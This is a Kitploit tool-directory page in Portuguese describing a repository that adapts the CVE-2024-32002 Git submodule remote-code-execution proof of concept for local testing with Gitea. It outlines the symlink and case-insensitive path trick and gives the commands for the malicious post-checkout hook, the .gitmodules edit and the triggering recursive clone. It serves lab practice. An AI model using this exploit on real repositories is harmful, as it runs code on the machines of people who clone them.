Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
running-CVE-2024-32002-locally-for-tesing — adaptando o CVE-2024-32002 para execução offline e local | Kitploit
Ferramentas/GitHubGitHub/chriswalker11/running-cve-2024-32002-locally-for-tesing
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e EducaçãoDesenvolvimento de PayloadsLabs e Prática
GitHubchriswalker11/running-cve-2024-32002-locally-for-tesing

running-CVE-2024-32002-locally-for-tesing

adaptando o CVE-2024-32002 para execução offline e local

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 2 anosAinda não revisado

Estamos adaptando isto para uso local

seguimos esta postagem de blog mas com algumas diferenças-chave https://amalmurali.me/posts/git-rce

Como Funciona

  1. Um repositório malicioso (git_rce) inclui um submódulo com um caminho especialmente criado.
  2. O caminho do submódulo usa uma variação de maiúsculas/minúsculas que explora o sistema de arquivos insensível a maiúsculas/minúsculas.
  3. O submódulo inclui um link simbólico apontando para seu diretório .git/, que contém um hook malicioso.
  4. Quando o repositório é clonado, o link simbólico é seguido e o hook malicioso é executado, levando a RCE.

Reprodução

⚠️ Aviso: Não execute este PoC em sistemas que você não possui ou não tem permissão explícita para usar. Testes não autorizados podem resultar em consequências indesejadas.

precisamos criar um token de API para o gitea, que pode ser encontrado em http://<YOUR_GITEA_SERVER_IP>:3000/user/settings/applications eu dei ao token acesso a tudo para garantir que tudo funcionasse

então podemos executar nosso poc.sh garantindo fornecer a ele as informações solicitadas, como o endereço IP e a porta do servidor gitea, o nome de usuário e o token para criar os repositórios

root@kitploit:~
Enter the IP address or FQDN (without http://): localhost:3000
Enter your username: chris
Enter your API token: 3c57dbe1756734612f457b1fa08583df64fb5ea4
Enter the name for the first repository: hook 
Enter the name for the second repository: main

também precisamos editar as linhas 42-46 para conter o payload

root@kitploit:~
# Write the malicious code to a hook
cat > y/hooks/post-checkout <<EOF
#!/bin/bash
calc.exe #or replace with other poc 
EOF

há mais uma etapa: devemos ir ao arquivo .gitmodules do repositório main para o hook. Eu fui manualmente ao repositório no gitea e alterei o arquivo

screenshot1

e então isso fez isto

root@kitploit:~
[submodule "x/y"]
	path = A/modules/x
	url = http://<your_git_tea_server>:3000/chris/hook.git

garantindo que quando eu fosse em A/modules pudesse ver algo como isto

screenshot2

então clicar nesse commit deve mostrar o outro repositório com o conteúdo do POC quando você clicar nele

então podemos pegar nossa URL e isso deve funcionar para acionar o exploit

root@kitploit:~
git clone --recursive http://<your_git_tea_server>:3000/<your_user_name>/main.git

Agradecimentos

Créditos a filip-hejsek e amalmurali47 por descobrirem esta vulnerabilidade e terem uma postagem de blog e repositório para adaptar

Baixar ferramenta